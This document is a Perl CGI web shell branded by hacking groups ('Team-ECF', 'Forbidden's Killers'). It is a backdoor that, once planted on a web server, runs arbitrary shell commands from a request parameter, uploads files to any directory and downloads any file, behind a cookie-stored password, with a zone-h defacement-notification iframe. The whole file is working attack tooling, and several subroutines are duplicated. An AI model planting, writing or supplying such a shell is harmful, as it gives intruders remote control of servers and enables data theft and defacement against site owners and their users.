CGI Forbidden Bypass Shell MOD by Team-ECF

1. #!/usr/bin/perl -I /usr/local/bandmin
2. #------------------------------------------------------------------------------
3. # Copyright (C) 2010 FoRB!ddeN's KiLLeRs
4. #
5. # EdiT3R: Leet Brain
6. # EdiT3R e-mail: nadimzobaer@gmail.com
7. # Author Homepage: http://www.nadimzobaer.com/
8. # My Group : 3xp1r3.com
9. # Greetz : ABO adaai - MooT HaCkEr - NaiF KSA
10. #------------------------------------------------------------------------------
11. $Password = "";    
12.  
13.  
14. $WinNT = 0;            
15.  
16. $NTCmdSep = "&";
17.  
18. $UnixCmdSep = ";";
19.  
20. $CommandTimeoutDuration = 10;
21.  
22. $ShowDynamicOutput = 1;
23.  
24.  
25.  
26. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
27. $CmdPwd = ($WinNT ? "cd" : "pwd");
28. $PathSep = ($WinNT ? "\\" : "/");
29. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
30.  
31.  
32. sub ReadParse
33. {
34.     local (*in) = @_ if @_;
35.     local ($i, $loc, $key, $val);
36.    
37.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
38.  
39.     if($ENV{'REQUEST_METHOD'} eq "GET")
40.     {
41.         $in = $ENV{'QUERY_STRING'};
42.     }
43.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
44.     {
45.         binmode(STDIN) if $MultipartFormData & $WinNT;
46.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
47.     }
48.  
49.    
50.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
51.     {
52.         $Boundary = '--'.$1;
53.         @list = split(/$Boundary/, $in);
54.         $HeaderBody = $list[1];
55.         $HeaderBody =~ /\r\n\r\n|\n\n/;
56.         $Header = $`;
57.         $Body = $';
58.          $Body =~ s/\r\n$//;
59.         $in{'filedata'} = $Body;
60.         $Header =~ /filename=\"(.+)\"/;
61.         $in{'f'} = $1;
62.         $in{'f'} =~ s/\"//g;
63.         $in{'f'} =~ s/\s//g;
64.  
65.        
66.         for($i=2; $list[$i]; $i++)
67.         {
68.             $list[$i] =~ s/^.+name=$//;
69.             $list[$i] =~ /\"(\w+)\"/;
70.             $key = $1;
71.             $val = $';
72.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
73.             $val =~ s/%(..)/pack("c", hex($1))/ge;
74.             $in{$key} = $val;
75.         }
76.     }
77.     else
78.     {
79.         @in = split(/&/, $in);
80.         foreach $i (0 .. $#in)
81.         {
82.             $in[$i] =~ s/\+/ /g;
83.             ($key, $val) = split(/=/, $in[$i], 2);
84.             $key =~ s/%(..)/pack("c", hex($1))/ge;
85.             $val =~ s/%(..)/pack("c", hex($1))/ge;
86.             $in{$key} .= "\0" if (defined($in{$key}));
87.             $in{$key} .= $val;
88.         }
89.     }
90. }
91.  
92. sub PrintPageHeader
93. {
94.     $EncodedCurrentDir = $CurrentDir;
95.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
96.     print "Content-type: text/html\n\n";
97.     print <<END;
98.    
99.    
100. <html>
101. <head>
102. <title> Team-ECF - Shell CGi </title>
103. $HtmlMetaHeader
104. </head>
105. <style>
106. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; }
107. textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
108. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
109. </style>
110. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="82" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
111.     <tr>
112. <td bgcolor="#808080" bordercolor="#990000" align="center" width="48%" height="32">
113.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
114.     <font color="#990000"><span style="font-weight: 700">--[</span></font><font color="#FFFF00"><span style="font-weight: 700">
115.     Shell CGI</span></font><span style="color: #DADADA; font-weight: 700">
116.     </span><font color="#990000">
117.     <span style="font-weight: 700">|</span></font><span style="color: #DADADA; font-weight: 700">
118.     </span>
119.     <font color="#00FF00"><span style="font-weight: 700">
120.     Perl V1.0</span></font><span style="color: #DADADA; font-weight: 700">
121.     </span>
122.     <span style="color: #990000; font-weight: 700">]--</span></td>
123.     </tr>
124.     <tr>
125.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
126.     <td width="48%" height="51" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px" bordercolorlight="#DADADA" bordercolordark="#C0C0C0" bordercolor="#D9D9D9">
127.     <p align="center">
128.     <b><font color="#FF0000">--[</font><span style="color: #DADADA">
129.     </span>
130.     <font size="3" color="#FFFF00">Saver run Shell</font><span style="color: #DADADA">
131.     </span><font color="#FF0000">]</font></b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><b><font color="#FF0000">--
132.     <span style="background-color: #C0C0C0">=-=</span> </font>
133.     <font style="font-size: 9pt" color="#D9D9D9">--[</font><font color="#FF0000" style="font-size: 9pt">
134.             </font>
135.     </b>
136.             <font style="font-weight: 700; background-color:#000000" color="#FFFFFF" size="3">$ServerName</font><font style="font-size: 9pt; font-weight: 700" color="#D9D9D9">
137.             </font>
138.     <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
139.             <b><font style="font-size: 9pt" color="#D9D9D9">]--</font></b></a></a></a></a></p>
140.     <center>
141.     <center>
142.     <form method="POST">
143.         <input type=hidden name=act value="mkfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
144.         <input type=hidden name="d" value="<?php echo $dispd; ?>" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
145.     </form></center></center></td></tr></table>
146.     <p align="center">
147.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none; background-color: #C0C0C0" href="$ScriptLocation?a=home">
148.  
149. <font color="#990000" face="Verdana" size="2">Home</font></a><font color="#990000" face="Verdana" size="2">
150.     | <span style="background-color: #C0C0C0">
151. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#990000">Upload File</span></font></a><font color="#990000">
152.     | </font><span style="background-color: #C0C0C0">
153. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#990000">Download File</font></a></span><font color="#990000">
154.         | </font><span style="background-color: #C0C0C0">
155. <a href="$ScriptLocation?a=logout"><font color="#990000">Disconnect</font></a></span></font>
156.         | </font><span style="background-color: #C0C0C0">
157. <a href="http://www.lauxanh.us"><font color="#990000">Lauxanh</font></a></span><font color="#990000"></p>
158.  
159. <body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
160. <div align="center">
161.     <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="14" width="93%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
162.         <tr><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
163.             <td width="97%" height="14" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px" bordercolorlight="#DADADA" bordercolordark="#C0C0C0" bordercolor="#D9D9D9">
164. <font size="3" color="#00FF00">
165.  
166. END
167. }
168.  
169.  
170. sub PrintLoginScreen
171. {
172.     $Message = q$</font><font color="#FFFF00" size="3">
173. <div align="center">
174.     <pre>
175. #-------------------------------------------------------------------------------------------#
176. |                                  Forbidden's Killers                                      |
177. |                                                                                           |
178. |                                      All The Way                                          |
179. |                                                                                           |
180. |                                     Edited By Team-ECF                                         |
181. |                                                                                           |
182. #-------------------------------------------------------------------------------------------#
183. |                              WebSite : blog.ecf.me                                   |
184. #-------------------------------------------------------------------------------------------#
185. |             Greetz To : My Group - ABO adaai - MooT HaCkEr - NaiF KSA                     |
186. #-------------------------------------------------------------------------------------------#</font></div><font size="3" color="#00FF00">
187.  
188. </html>
189. $;
190. #'
191.     print <<END;
192. <code>$Message
193. END
194. }
195.  
196. sub PrintLoginFailedMessage
197. {
198.     print <<END;
199. <code>
200. <p align="center">&nbsp;</p>
201. <p align="center"><font color="#FF0000">#</font><font color="#FFFFFF">--------------------------------------------------------------------------------------------------</font><font color="#FF0000">#</font></p>
202. <p align="center"><b>
203. <font size="6" color="#C0C0C0">OoPs !!! = </font><font size="6" color="#FF0000">Wr0nG P4sSw0rD</font></b></p>
204. <p align="center"><b><font size="6" color="#FFFF00">
205. Try Again</font></b></p>
206. <p align="center"><font color="#FF0000">#</font><font color="#FFFFFF">--------------------------------------------------------------------------------------------------</font><font color="#FF0000">#</font></p>
207. <p align="center"><font color="#FFFFFF"><br>
208. &nbsp;</font></p>
209. </code>
210. END
211. }
212.  
213. sub PrintLoginForm
214. {
215.     print <<END;
216. <code>
217. <body>
218.  
219. <form name="f" method="POST" action="$ScriptLocation">
220. <input type="hidden" name="a" value="login">
221. <p align="center"><b><font size="3" color="#FF0000">
222. I</font><font size="3" color="#C0C0C0">nt</font><font size="3" color="#FF0000">e</font><font size="3" color="#C0C0C0">r
223. Th</font><font size="3" color="#FF0000">e</font><font size="3" color="#C0C0C0">
224. Pa</font><font size="3" color="#FF0000">ss</font><font size="3" color="#C0C0C0">W</font><font size="3" color="#FF0000">o</font><font size="3" color="#C0C0C0">rd<u><span style="background-color: #333333">
225. </span> </u> </font></b>
226. </p>
227. <p align="center"><font size="3" color="#990000"> &nbsp;</font><input type="password" name="p" size="38"></p>
228. <p align="center"><input type="submit" value="Enter">
229. </p>
230. </form>
231. </code>
232. END
233. }
234.  
235. sub PrintPageFooter
236. {
237.     print <<END;
238. <code>
239. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
240.     <td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
241.     <p align="center"><b>
242.     --[ T<font color="#FF0000">G</font>B <font color="#FFFFFF">
243.     <span lang="en-us">|</span></font>
244.     <a href="http://Xgroupvn.Org" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000">
245.     http://XGroupvn.Org</font></a> <font color="#FFFFFF"><span lang="en-us">|</span></font> T<font color="#FF0000">G</font>B ]--</b></td></tr></table>
246. </code>
247. END
248. }
249.  
250.  
251. sub GetCookies
252. {
253.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
254.     foreach $cookie(@httpcookies)
255.     {
256.         ($id, $val) = split(/=/, $cookie);
257.         $Cookies{$id} = $val;
258.     }
259. }
260.  
261. sub home
262. {
263.         &PrintPageHeader("p");
264.         &PrintCommandLineInputForm;
265.         &PrintPageFooter;
266. END
267. }
268.  
269. sub zone
270. {
271.     print <<END;
272. <code>
273. <p align="center">
274. <IFRAME WIDTH="915" HEIGHT="978" SRC="http://www.zone-h.org/notify/single"></IFRAME>
275. </p>
276. END
277. }
278.  
279. sub kasber
280. {
281.     print <<END;
282. <code>
283. <p>&nbsp;</p>
284. <p>&nbsp;</p>
285. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
286. <tr>
287. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
288. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
289. <tr>
290. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
291. <font size="5" color="#C0C0C0"><b>Edited Code By Thieugiabuon</b></font></td>
292. </tr>
293. <tr>
294. <td bgcolor="#C0C0C0" height="25">
295. <p align="center"><b><font size="5" color="#990000">My Email</font><font size="5" color="#808080">
296. </font><font size="5" color="#990000"><span style="background-color: #808080">:</span></font><font size="5" color="#808080">
297. </font><font size="5" color="#990000">Kill ALL</font></b><p align="center">
298. <b>
299. <font size="5" color="#666666"></font><font size="5" color="#990000">
300. <span style="background-color: #808080">:</span>
301. <span style="background-color: #808080">+</span>
302. <span style="background-color: #808080">+</span></font></b></td>
303. </tr>
304. </table>
305. </td>
306. </tr>
307. </table>
308. <p>&nbsp;</p>
309. <p>&nbsp;</p>
310.             <p align="center"></p>
311. </code>
312. END
313. }
314.  
315. sub PrintLogoutScreen
316. {
317.     print "<code>Connection are closed by The Perl</code>";
318. }
319.  
320. sub kasber
321. {
322.     &PrintPageHeader("p");
323.     print <<END;
324. <code>
325. <p>&nbsp;</p>
326. <p>&nbsp;</p>
327. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
328. <tr>
329. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
330. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
331. <tr>
332. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
333. <font size="5" color="#C0C0C0"><b>Ed!T c0d3 By Dr.KAsBeR</b></font></td>
334. </tr>
335. <tr>
336. <td bgcolor="#C0C0C0" height="25">
337. <p align="center"><b><font size="5" color="#990000">My Email</font><font size="5" color="#808080">
338. </font><font size="5" color="#990000"><span style="background-color: #808080">:</span></font><font size="5" color="#808080">
339. </font><font size="5" color="#990000">Dr.KAsBeR403 [at] GmaiL [dot] CoM</font></b><p align="center">
340. <b>
341. <font size="5" color="#666666">Gr33tZ To</font><font size="5" color="#990000">
342. <span style="background-color: #808080">:</span> Dr.DaShEr
343. <span style="background-color: #808080">+</span> NeX
344. <span style="background-color: #808080">+</span> RmZ AlJnOoP</font></b></td>
345. </tr>
346. </table>
347. </td>
348. </tr>
349. </table>
350. <p>&nbsp;</p>
351. <p>&nbsp;</p>
352. </code>
353. END
354. }
355.  
356.  
357. sub zone
358. {
359.     &PrintPageHeader("p");
360.     print <<END;
361. <code>
362. <p align="center">
363. <IFRAME WIDTH="915" HEIGHT="978" SRC="http://www.zone-h.org/notify/single"></IFRAME>
364. </p>
365. </code>
366. END
367. }
368.  
369. sub PerformLogout
370. {
371.     print "Set-Cookie: SAVEDPWD=;\n";
372.     &PrintPageHeader("p");
373.     &PrintLogoutScreen;
374.     &PrintLoginScreen;
375.     &PrintLoginForm;
376.     &PrintPageFooter;
377. }
378.  
379.  
380. sub PerformLogin
381. {
382.     if($LoginPassword eq $Password)
383.     {
384.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
385.         &PrintPageHeader("c");
386.         &PrintCommandLineInputForm;
387.         &PrintPageFooter;
388.     }
389.     else # password didn't match
390.     {
391.         &PrintPageHeader("p");
392.         &PrintLoginScreen;
393.         if($LoginPassword ne "")
394.         {
395.             &PrintLoginFailedMessage;
396.         }
397.         &PrintLoginForm;
398.         &PrintPageFooter;
399.     }
400. }
401.  
402.  
403. sub PrintCommandLineInputForm
404. {
405.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
406.     print <<END;
407. <code>
408. <form name="f" method="POST" action="$ScriptLocation">
409. <input type="hidden" name="a" value="command">
410. <input type="hidden" name="d" value="$CurrentDir">
411. <p align="center">&nbsp;</p>
412. </font>
413. <p align="center"><font size="3" color="#00FF00">
414.  
415. <font color="#FFFF00">$Prompt</font>
416. <input type="text" name="c" size="40">
417. </p>
418. <p align="center">
419. <input type="submit" value="Enter">
420. </p>
421. </form>
422. </code>
423. END
424. }
425.  
426.  
427. sub PrintFileDownloadForm
428. {
429.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
430.     print <<END;
431. <code>
432. <body>
433.  
434. <form name="f" method="POST" action="$ScriptLocation">
435. <input type="hidden" name="d" value="$CurrentDir">
436. <input type="hidden" name="a" value="download">
437. </font><font size="3" color="#FF0000">
438.  
439. <p align="center">$Prompt download</font><font size="3" color="#00FF00"><br><br>
440. </font><font size="3" color="#FFFF00">
441.  
442. Filename:</font><font size="3" color="#00FF00">
443.  
444. <input type="text" name="f" size="35"><br><br>
445. </font><font size="3" color="#FFFFFF">
446.  
447. Download:</font><font size="3" color="#00FF00">
448.  
449. <input type="submit" value="Begin">
450. </p>
451. </form>
452. </code>
453. END
454. }
455.  
456.  
457. sub PrintFileUploadForm
458. {
459.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
460.     print <<END;
461. <code>
462. </font><font size="3" color="#FF0000">
463.  
464. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
465. <p align="center">$Prompt upload</font><font size="3" color="#00FF00"><br><br>
466. </font><font size="3" color="#FFFF00">
467.  
468. Filename:</font><font size="3" color="#00FF00">
469.  
470. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
471. <input type="file" name="f0" size="35"></a><br><br>
472. Options: &nbsp;<input type="checkbox" name="o" value="overwrite" checked>
473. </font><font size="3" color="#FFFF00">
474.  
475. Overwrite if it Exists</font><font size="3" color="#00FF00"><br><br>
476. </font><font size="3" color="#FFFFFF">
477.  
478. Upload:</font><font size="3" color="#00FF00">&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
479. <input type="hidden" name="d" value="$CurrentDir">
480. <input type="hidden" name="a" value="upload">
481. </p>
482. </form>
483. </code>
484. END
485. }
486.  
487.  
488. sub CommandTimeout
489. {
490.     if(!$WinNT)
491.     {
492.         alarm(0);
493.         print <<END;
494. </xmp>
495. <code>
496. Command exceeded maximum time of $CommandTimeoutDuration second(s).
497. <br>Killed it!
498. <code>
499. END
500.         &PrintCommandLineInputForm;
501.         &PrintPageFooter;
502.         exit;
503.     }
504. }
505.  
506.  
507. sub ExecuteCommand
508. {
509.     if($RunCommand =~ m/^\s*cd\s+(.+)/)
510.     {
511.         # we change the directory internally. The output of the
512.         # command is not displayed.
513.        
514.         $OldDir = $CurrentDir;
515.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
516.         chop($CurrentDir = `$Command`);
517.         &PrintPageHeader("c");
518.         $Prompt = $WinNT ? "$OldDir> " : "[love\@$ServerName $OldDir]\$ ";
519.         print "<code>$Prompt $RunCommand</code>";
520.     }
521.     else # some other command, display the output
522.     {
523.         &PrintPageHeader("c");
524.         $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
525.         print "<code>$Prompt $RunCommand</code><xmp>";
526.         $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
527.         if(!$WinNT)
528.         {
529.             $SIG{'ALRM'} = \&CommandTimeout;
530.             alarm($CommandTimeoutDuration);
531.         }
532.         if($ShowDynamicOutput)
533.         {
534.             $|=1;
535.             $Command .= " |";
536.             open(CommandOutput, $Command);
537.             while(<CommandOutput>)
538.             {
539.                 $_ =~ s/(\n|\r\n)$//;
540.                 print "$_\n";
541.             }
542.             $|=0;
543.         }
544.         else
545.         {
546.             print `$Command`;
547.         }
548.         if(!$WinNT)
549.         {
550.             alarm(0);
551.         }
552.         print "</xmp>";
553.     }
554.     &PrintCommandLineInputForm;
555.     &PrintPageFooter;
556. }
557.  
558.  
559.  
560. sub PrintDownloadLinkPage
561. {
562.     local($FileUrl) = @_;
563.     if(-e $FileUrl)
564.     {
565.  
566.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
567.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
568.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
569.         &PrintPageHeader("c");
570.         print <<END;
571. <code>
572. <p align="center">Sending File $TransferFile...<br>
573. If the download does not start automatically,
574. <a href="$DownloadLink">Click Here</a>.</p>
575. </code>
576. END
577.         &PrintCommandLineInputForm;
578.         &PrintPageFooter;
579.     }
580.     else # file doesn't exist
581.     {
582.         &PrintPageHeader("f");
583.         print "<code>Failed to download $FileUrl: $!</code>";
584.         &PrintFileDownloadForm;
585.         &PrintPageFooter;
586.     }
587. }
588.  
589. sub SendFileToBrowser
590. {
591.     local($SendFile) = @_;
592.     if(open(SENDFILE, $SendFile))
593.     {
594.         if($WinNT)
595.         {
596.             binmode(SENDFILE);
597.             binmode(STDOUT);
598.         }
599.         $FileSize = (stat($SendFile))[7];
600.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
601.         print "Content-Type: application/x-unknown\n";
602.         print "Content-Length: $FileSize\n";
603.         print "Content-Disposition: attachment; filename=$1\n\n";
604.         print while(<SENDFILE>);
605.         close(SENDFILE);
606.     }
607.     else
608.     {
609.         &PrintPageHeader("f");
610.         print "<code>Failed to download $SendFile: $!</code>";
611.         &PrintFileDownloadForm;
612.         &PrintPageFooter;
613.     }
614. }
615.  
616.  
617.  
618. sub BeginDownload
619. {
620.  
621.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
622.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
623.     {
624.         $TargetFile = $TransferFile;
625.     }
626.     else
627.     {
628.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
629.         $TargetFile .= $PathSep.$TransferFile;
630.     }
631.  
632.     if($Options eq "go")
633.     {
634.         &SendFileToBrowser($TargetFile);
635.     }
636.     else
637.     {
638.         &PrintDownloadLinkPage($TargetFile);
639.     }
640. }
641.  
642. sub UploadFile
643. {
644.    
645.     if($TransferFile eq "")
646.     {
647.         &PrintPageHeader("f");
648.         &PrintFileUploadForm;
649.         &PrintPageFooter;
650.         return;
651.     }
652.     &PrintPageHeader("c");
653.  
654.    
655.     print "<code>Uploading $TransferFile to $CurrentDir...<br>";
656.  
657.  
658.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
659.     $TransferFile =~ m!([^/^\\]*)$!;
660.     $TargetName .= $PathSep.$1;
661.  
662.     $TargetFileSize = length($in{'filedata'});
663.  
664.     if(-e $TargetName && $Options ne "overwrite")
665.     {
666.         print "Failed: Destination file already exists.<br>";
667.     }
668.     else # file is not present
669.     {
670.         if(open(UPLOADFILE, ">$TargetName"))
671.         {
672.             binmode(UPLOADFILE) if $WinNT;
673.             print UPLOADFILE $in{'filedata'};
674.             close(UPLOADFILE);
675.             print "Transfered $TargetFileSize Bytes.<br>";
676.             print "File Path: $TargetName<br>";
677.         }
678.         else
679.         {
680.             print "Failed: $!<br>";
681.         }
682.     }
683.     print "</code>";
684.     &PrintCommandLineInputForm;
685.     &PrintPageFooter;
686. }
687.  
688. sub UploadFile
689. {
690.    
691.     if($TransferFile eq "")
692.     {
693.         &PrintPageHeader("f");
694.         &PrintFileUploadForm;
695.         &PrintPageFooter;
696.         return;
697.     }
698.     &PrintPageHeader("c");
699.  
700.    
701.     print "<code>Uploading $TransferFile to $CurrentDir...<br>";
702.  
703.  
704.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
705.     $TransferFile =~ m!([^/^\\]*)$!;
706.     $TargetName .= $PathSep.$1;
707.  
708.     $TargetFileSize = length($in{'filedata'});
709.  
710.     if(-e $TargetName && $Options ne "overwrite")
711.     {
712.         print "Failed: Destination file already exists.<br>";
713.     }
714.     else # file is not present
715.     {
716.         if(open(UPLOADFILE, ">$TargetName"))
717.         {
718.             binmode(UPLOADFILE) if $WinNT;
719.             print UPLOADFILE $in{'filedata'};
720.             close(UPLOADFILE);
721.             print "Transfered $TargetFileSize Bytes.<br>";
722.             print "File Path: $TargetName<br>";
723.         }
724.         else
725.         {
726.             print "Failed: $!<br>";
727.         }
728.     }
729.     print "</code>";
730.     &PrintCommandLineInputForm;
731.     &PrintPageFooter;
732. }
733.  
734.  
735. sub DownloadFile
736. {
737.  
738.     if($TransferFile eq "")
739.     {
740.         &PrintPageHeader("f");
741.         &PrintFileDownloadForm;
742.         &PrintPageFooter;
743.         return;
744.     }
745.    
746.  
747.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
748.         (!$WinNT & ($TransferFile =~ m/^\//)))
749.     {
750.         $TargetFile = $TransferFile;
751.     }
752.     else
753.     {
754.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
755.         $TargetFile .= $PathSep.$TransferFile;
756.     }
757.  
758.     if($Options eq "go")
759.     {
760.         &SendFileToBrowser($TargetFile);
761.     }
762.     else
763.     {
764.         &PrintDownloadLinkPage($TargetFile);
765.     }
766. }
767.  
768.  
769. &ReadParse;
770. &GetCookies;
771.  
772. $ScriptLocation = $ENV{'SCRIPT_NAME'};
773. $ServerName = $ENV{'SERVER_NAME'};
774. $LoginPassword = $in{'p'};
775. $RunCommand = $in{'c'};
776. $TransferFile = $in{'f'};
777. $Options = $in{'o'};
778.  
779. $Action = $in{'a'};
780. $Action = "login" if($Action eq "");
781.  
782.  
783. $CurrentDir = $in{'d'};
784. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
785.  
786. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
787.  
788. if($Action eq "login" || !$LoggedIn)
789. {
790.     &PerformLogin;
791. }
792. elsif($Action eq "command")
793. {
794.     &ExecuteCommand;
795. }
796. elsif($Action eq "upload")
797. {
798.     &UploadFile;
799. }
800. elsif($Action eq "download")
801. {
802.     &DownloadFile;
803. }
804. elsif($Action eq "kasber")
805. {
806.     &kasber;
807. }
808. elsif($Action eq "zone")
809. {
810.     &zone;
811. }
812. elsif($Action eq "home")
813. {
814.     &home;
815. }
816. elsif($Action eq "logout")
817. {
818.     &PerformLogout;
819. }